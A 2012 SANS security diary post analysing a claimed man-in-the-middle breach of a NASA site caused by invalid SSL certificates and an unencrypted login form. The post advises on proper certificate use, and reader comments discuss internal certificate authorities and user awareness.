My next class:

NASA Man-in-the-Middle Attack: Why you should use proper SSL Certificates

Published: 2012-05-31. Last Updated: 2012-05-31 18:38:02 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)

A posting to pastebin, by a group that calls itself "Cyber Warrior Team from Iran", claims to have breached a NASA website via a "Man in the Middle" attack. The announcement is a bit hard to read due to the broken english, but here is how I parse the post and the associated screenshot:

The "Cyber Warrior Team" used a tool to scan NASA websites for SSL misconfigurations. They came across a site that used an invalid, likely self signed or expired certificate. Users visiting this web site would be used to seeing a certificate warning. This made it a lot easier to launch a man in the middle attack. In addition, the login form on the index page isn't using SSL, making it possible to intercept and modify it unnoticed.

Once the attacker set up the man in the middle attack, they were able to collect username and passwords.

Based on this interpretation, the lesson should be to stop using self signed or invalid certificates for "obscure" internal web sites. I have frequently seen the argument that for an internal web site "it is not important" or "too expensive" or "too complex" to setup a valid certificate. SSL isn't doing much for you if the certificate is not valid. The encryption provided by SSL only works if the authentication works as well. Otherwise, you never know if the key you negotiated was negotiated with the right party.

And of course, the log in form on the index page should be delivered via SSL as well. Even if the form is submitted via SSL, it is subject to tampering if it is delivered via http vs. https. 

good old "OWASP Top 10" style lessons, but sadly, we still need to repeat them again and again. For a nice test to see if SSL is configured right on your site, see ssllabs.com .

Also, in more complex environments, you need to make sure that all of your SSL certificates are in sync. We recently updated SSL certificates, and forgot to update the one used by our IPv6 web server. (thnx Kees for pointing that out to us). 

[1] http://pastebin.com/MFPMGZ4Z

[2] https://www.ssllabs.com

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: nasa
4 comment(s)
My next class:

Comments

If you want SSL for internal websites but don't want to spend the money on SSL certificates, a good solution is to create your own CA Certificate and sign your certificates with your own CA. Then distribute your CA to all your clients (not feasible if you don't manage them), and you have free internal SSL.
We use a trusted internal root for many internal certificates. That is more or less what Microsoft wants you to do.
But since startssl.com is free, and trusted by most browsers, that is a solution that is often used as well. (Costs $60/year if you want 2 year certs and/or SAN).

One problem today is, that there are still servers out there that should have been nuked long ago. They do not support 2048 bit keylengths, which is the shortest you can buy a public certificate for.
Thanks for the Info i have had a couple of "Internal" sites with self signed certificates that were on SSL from the index page all the way through. My company does not want to provide funds to pay for a certificate for this so the idea of creating your own CA cert is good. Thanks for the idea Chris.

http://mjddesign.wordpress.com
One of the main issues is that the general user doesn't care about, or pay attention to, the red address bar when a certificate issue is detected in IE (Firefox makes you actually confirm that you accept the risk). Awareness training is needed to get those users to immediately stop browsing the site when they see the "bad cert" indicators.

Diary Archives